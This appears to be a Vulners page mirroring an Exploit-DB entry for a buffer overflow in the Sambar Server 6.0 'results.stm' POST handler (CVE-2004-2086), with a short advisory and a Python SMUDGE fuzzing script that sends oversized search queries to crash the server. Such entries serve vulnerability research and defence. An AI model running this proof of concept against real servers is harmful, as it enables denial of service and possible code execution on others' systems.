Lucene search
+L

Sambar Server 6.0 - 'results.stm' POST Buffer Overflow

🗓️ 09 Feb 2004 00:00:00Reported by [email protected]Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Buffer overflow in Sambar Server 6.0 may allow denial of service and code execution.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2004-2086
13 Feb 201000:00
circl
cve
CVE
CVE-2004-2086
19 May 200504:00
cve
cvelist
Cvelist
CVE-2004-2086
19 May 200504:00
cvelist
exploitdb
Exploit DB
Sambar Server 6 - Search Results Buffer Overflow (Metasploit)
13 Feb 201000:00
exploitdb
metasploit
Metasploit
Sambar 6 Search Results Buffer Overflow
13 Feb 201020:15
metasploit
nvd
NVD
CVE-2004-2086
6 Feb 200405:00
nvd
openvas
OpenVAS
Sambar <= 6.0 DoS Vulnerability
3 Nov 200500:00
openvas
packetstorm
Packet Storm
Sambar 6 Search Results Buffer Overflow
15 Feb 201000:00
packetstorm
source: https://www.securityfocus.com/bid/9607/info

A buffer overflow vulnerability has been reported in the Sambar web server. The issue is due to a boundary condition error in the POST data processing of the affected software.

Immediate consequences of an attack may result in a denial of service condition. It may also be possible for the attacker to manipulate process memory and execute arbitrary code in the context of the vulnerable process.

# http://felinemenace.org/~nd/SMUDGE
# Sambar script (c) [email protected]
from SMUDGE import *
import sys
sm = SMUDGE(1)

sm.setname("SambarOverflow")

sm.plain("POST /search/results.stm HTTP/1.1")
sm.addcrlf()
sm.plain("Host: MSUDGEDPU")
sm.addcrlf()
sm.plain("Content-Length: ")
sm.blocksize("postdata")
sm.addcrlf()
sm.addcrlf()
sm.putblock("postdata")
sm.addcrlf()
sm.addcrlf()

sm.newblock("postdata")
sm.updateblock("postdata","spage=0&indexname=docs&query=")
sm.blockvariable("postdata","MEEP")
sm.updateblock("postdata","&style=page")

sm.run("127.0.0.1",80,"topdown","single")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Sep 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.75479
23